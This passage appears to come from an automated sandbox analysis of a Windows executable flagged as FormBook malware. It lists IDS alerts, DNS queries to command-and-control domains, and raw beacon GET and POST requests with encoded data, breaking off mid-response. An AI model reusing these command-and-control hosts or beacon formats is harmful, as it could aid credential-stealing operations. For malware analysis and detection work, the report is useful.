            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49777 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49781 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49781 -> 85.159.66.93:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Thu, 26 Sep 2024 07:26:23 GMTserver: Apacheset-cookie: __tad=1727335583.8586432; expires=Sun, 24-Sep-2034 07:26:23 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Thu, 26 Sep 2024 07:26:25 GMTserver: Apacheset-cookie: __tad=1727335585.2645835; expires=Sun, 24-Sep-2034 07:26:25 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Thu, 26 Sep 2024 07:26:28 GMTserver: Apacheset-cookie: __tad=1727335588.3604621; expires=Sun, 24-Sep-2034 07:26:28 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: GET /2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?y0qt3F=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?y0qt3F=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?y0qt3F=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?y0qt3F=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?y0qt3F=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /lrst/?y0qt3F=mDrmkSN/AS2kB6lxw+ox9UfR9hI3CHIhmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KclyEBWGGMepgvGhsxtLzd1Vd+SluWBGSo6Y=&kZ=E8WpI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sailnway.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.nobartv6.website
            Source: global trafficDNS traffic detected: DNS query: www.sailnway.net
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 79 30 71 74 33 46 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 68 62 58 62 50 76 38 4f 73 4c 6a 43 41 63 70 71 6d 51 4f 6f 31 57 70 61 75 35 41 4e 48 76 56 73 67 3d 3d Data Ascii: y0qt3F=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 26 Sep 2024 07:24:27 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 26 Sep 2024 07:24:30 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 26 Sep 2024 07:24:35 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 07:24:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 